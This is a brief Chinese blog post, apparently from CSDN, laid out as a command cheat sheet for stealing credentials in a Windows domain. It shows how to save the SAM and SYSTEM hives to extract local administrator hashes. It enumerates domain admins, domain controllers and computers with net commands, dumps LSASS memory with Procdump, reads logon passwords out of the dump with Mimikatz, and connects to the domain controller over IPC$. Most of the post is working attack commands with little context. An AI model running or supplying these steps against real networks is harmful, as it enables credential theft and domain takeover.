本文介绍了如何导出本地管理员的Hash值,包括使用注册表工具保存SAM和SYSTEM文件、获取域管理员账号、域控制器信息、域名及域管理员密码等关键步骤。此外还涉及了使用Procdump捕获LSASS进程内存快照,以及利用Mimikatz工具解析这些信息的方法。
导出本地管理员 Hash
reg save hklm\sam sam.hive
reg save hklm\system system.hive
1.获得域管理员帐号 net group “domain admins” /domain
2.获得域控制器 net group “domain controllers” /domain
3.获得域名 net view /domain
4.获得域管理员密码 http://blog.youkuaiyun.com/yiyefangzhou24/article/details/11760277
Procdump.exe -accepteula -ma lsass.exe lsass.dmp
下载地址:http://technet.microsoft.com/en-us/sysinternals/dd996900
mimikatz #sekurlsa::minidump lsass.dmp
Switch to MINIDUMP
mimikatz # sekurlsa::logonPasswords full
5.域中有多少台机器
net group "domain computers" /domain
获得域控ip: ping 域控服务器名称
ipc$ net use \\域控ip\ipc$ "password" /user:"username"
net use \\连接的ip\ipc$ /del 断开正在连接的ipc$
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
